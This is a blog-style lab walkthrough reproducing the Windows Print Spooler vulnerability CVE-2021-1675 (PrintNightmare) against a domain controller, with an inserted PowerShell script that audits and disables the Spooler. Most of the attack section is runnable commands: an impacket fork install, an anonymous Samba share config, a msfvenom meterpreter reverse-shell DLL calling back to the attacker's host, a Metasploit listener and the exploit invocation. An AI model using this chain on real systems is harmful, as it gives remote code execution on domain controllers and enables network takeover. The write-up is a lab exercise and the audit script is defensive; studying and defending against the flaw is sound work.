Reproducing Microsoft vulnerability CVE-2021-1675 – author: zcczcc

Affected versions

  • Windows Server 2012 R2 (Server Core installation)

  • Windows Server 2012 R2

  • Windows Server 2012 (Server Core installation)

  • Windows Server 2012

  • Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)

  • Windows Server 2008 R2 for x64-based Systems Service Pack 1

  • Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)

  • Windows Server 2008 for x64-based Systems Service Pack 2

  • Windows Server 2008 32-bit Systems Service Pack 2 (Server Core installation)

  • Windows Server 2008 32-bit Systems Service Pack 2

  • Windows RT 8.1

  • Windows 8.1 for x64-based systems

  • Windows 8.1 32-bit systems

  • Windows 7 for x64-based Systems Service Pack 1

  • Windows 7 32-bit Systems Service Pack 1

  • Windows Server 2016 (Server Core installation)

  • Windows Server 2016

  • Windows 10 Version 1607 for x64-based Systems

  • Windows 10 Version 1607 32-bit Systems

  • Windows 10 for x64-based Systems

  • Windows 10 32-bit Systems

  • Windows Server, version 20H2 (Server Core Installation)

  • Windows 10 Version 20H2 for ARM64-based Systems

  • Windows 10 Version 20H2 32-bit Systems

  • Windows 10 Version 20H2 for x64-based Systems

  • Windows Server, version 2004 (Server Core installation)

  • Windows 10 Version 2004 for x64-based Systems

  • Windows 10 Version 2004 for ARM64-based Systems

  • Windows 10 Version 2004 32-bit Systems

  • Windows 10 Version 21H1 32-bit Systems

  • Windows 10 Version 21H1 for ARM64-based Systems

  • Windows 10 Version 21H1 for x64-based Systems

  • Windows Server, version 1909 (Server Core installation)

  • Windows 10 Version 1909 for ARM64-based Systems

  • Windows 10 Version 1909 for x64-based Systems

  • Windows 10 Version 1909 32-bit Systems

  • Windows Server 2019 (Server Core installation)

  • Windows Server 2019

  • Windows 10 Version 1809 for ARM64-based Systems

  • Windows 10 Version 1809 for x64-based Systems

  • Windows 10 Version 1809 32-bit Systems

Lab setup: Kali: 192.168.173.133
Domain controller: Windows Server 2019, 192.168.173.139 (must be 2019 or 2016)

First, set up a domain controller (the steps for promoting a DC are omitted here).

Then create an ordinary domain user.

Windows machines have the Print Spooler service enabled by default; without it, printing does not work.

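Because the Spooler runs by default, the first thing a defender wants is a quick way to see whether a host (above all a domain controller) still exposes it and to turn it off where printing is not needed. The script below is an added example written for this page, not code from the original post or from the cube0x0 repositories. The registry value names it reads (PointAndPrint\NoWarningNoElevationOnInstall, PointAndPrint\UpdatePromptSettings, PointAndPrint\RestrictDriverInstallationToAdministrators and Printers\RegisterSpoolerRemoteRpcEndPoint) are the Point and Print policy values from Microsoft's published mitigation guidance for this vulnerability; the post itself does not mention them. The function names Get-SpoolerExposure and Disable-Spooler are my own.

```powershell
# Added example (not from the original post): audit a Windows host for the
# Print Spooler exposure described above and, with -Remediate, apply the
# mitigation Microsoft recommends for hosts that do not need to print
# (stop and disable the Spooler service). Run in an elevated PowerShell.
[CmdletBinding()]
param(
    [switch]$Remediate
)

function Get-SpoolerExposure {
    $svc = Get-Service -Name Spooler -ErrorAction SilentlyContinue
    # Win32_OperatingSystem.ProductType: 1 = workstation, 2 = domain controller, 3 = server
    $os   = Get-CimInstance -ClassName Win32_OperatingSystem
    $isDc = ($os.ProductType -eq 2)

    $printers = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows NT\Printers'
    $pnp      = "$printers\PointAndPrint"

    # Read a DWORD policy value; $null means the policy is not configured at all
    function Read-Dword([string]$Path, [string]$Name) {
        $item = Get-ItemProperty -Path $Path -Name $Name -ErrorAction SilentlyContinue
        if ($null -eq $item) { return $null }
        return [int]$item.$Name
    }

    $result = [ordered]@{
        ComputerName       = $env:COMPUTERNAME
        IsDomainController = $isDc
        SpoolerStatus      = if ($svc) { $svc.Status.ToString() }    else { 'NotInstalled' }
        SpoolerStartType   = if ($svc) { $svc.StartType.ToString() } else { 'NotInstalled' }
        # 1 suppresses the warning and elevation prompt when a printer driver is installed
        NoWarningNoElevationOnInstall              = Read-Dword $pnp 'NoWarningNoElevationOnInstall'
        # 0 = warn and prompt for elevation; 1 or 2 remove one or both of those prompts
        UpdatePromptSettings                       = Read-Dword $pnp 'UpdatePromptSettings'
        # 1 restricts printer driver installation to administrators
        RestrictDriverInstallationToAdministrators = Read-Dword $pnp 'RestrictDriverInstallationToAdministrators'
        # 2 = "Allow Print Spooler to accept client connections" policy is disabled (no remote RPC)
        RegisterSpoolerRemoteRpcEndPoint           = Read-Dword $printers 'RegisterSpoolerRemoteRpcEndPoint'
    }

    $findings = @()
    if ($isDc -and $svc -and $svc.Status -eq 'Running') {
        $findings += 'Print Spooler is running on a domain controller; disable it unless the DC must print.'
    }
    if ($result.NoWarningNoElevationOnInstall -eq 1) {
        $findings += 'NoWarningNoElevationOnInstall=1 suppresses the driver-install prompt; set it to 0 or remove it.'
    }
    if ($result.UpdatePromptSettings -in 1, 2) {
        $findings += 'UpdatePromptSettings is not 0; driver-update prompts are weakened.'
    }
    if ($result.RestrictDriverInstallationToAdministrators -eq 0) {
        $findings += 'RestrictDriverInstallationToAdministrators=0 lets non-administrators install printer drivers.'
    }
    if ($svc -and $svc.Status -eq 'Running' -and $result.RegisterSpoolerRemoteRpcEndPoint -ne 2) {
        $findings += 'Spooler accepts remote RPC connections (RegisterSpoolerRemoteRpcEndPoint is not 2).'
    }
    $result.Findings = $findings
    return [pscustomobject]$result
}

function Disable-Spooler {
    # Stop the service now and keep it from starting on the next boot
    Stop-Service -Name Spooler -Force
    Set-Service  -Name Spooler -StartupType Disabled
    return (Get-Service -Name Spooler)
}

$report = Get-SpoolerExposure
$report | Format-List
if ($Remediate -and $report.Findings.Count -gt 0) {
    Disable-Spooler | Format-Table Name, Status, StartType
}
```

Run it without switches to get a report; a DC with a running Spooler and no Point and Print hardening will list every finding. Pass -Remediate only on hosts that do not need to print, since disabling the Spooler also stops local printing, exactly the side effect the sentence above points out.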

1. First download and install the author's (cube0x0's) fork of impacket, from:

https://github.com/cube0x0/impacket


Run:

cd impacket
python3 ./setup.py install


2. Enable anonymous SMB access

2.1 Configure /etc/samba/smb.conf
The original author's configuration did not work for me either; I later used the configuration from the Gamma Lab WeChat account, after which the share could be accessed. Link: https://mp.weixin.qq.com/s/iNOb6cBAfMwCm2AjqbdEvQ


[global]
map to guest = Bad User
server role = standalone server
usershare allow guests = yes
idmap config * : backend = tdb
smb ports = 445

[smb]
comment = Samba
path = /tmp/
guest ok = yes
read only = no
browsable = yes

After configuring it, start smbd:

sudo service smbd start

Because spoolsv.exe is a 64-bit process, the generated DLL must also be x64. Generate the DLL:

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.173.133 LPORT=7893 -f dll -o /tmp/rever.dll


Start the listener:

msfconsole
use exploit/multi/handler 
set payload windows/x64/meterpreter/reverse_tcp
set lhost 192.168.173.133
set lport 7893
run


Exploit link:

https://github.com/cube0x0/CVE-2021-1675


Run the exploit directly:

python3 CVE-2021-1675.py <domain>/<ordinary domain user>:<password>@<DC IP> <path to the shared file on the SMB server>


On the last step I hit an inexplicable problem: the session never came back, not even when I copied the VM environment in which my senior classmate got a session onto my own computer, so I had him take a screenshot instead. I'll reinstall the system over the weekend; this is not the first time this has happened, and reinstalling fixes 100% of problems.

Source: freebuf.com 2021-07-07 12:11:14 by: zcczcc
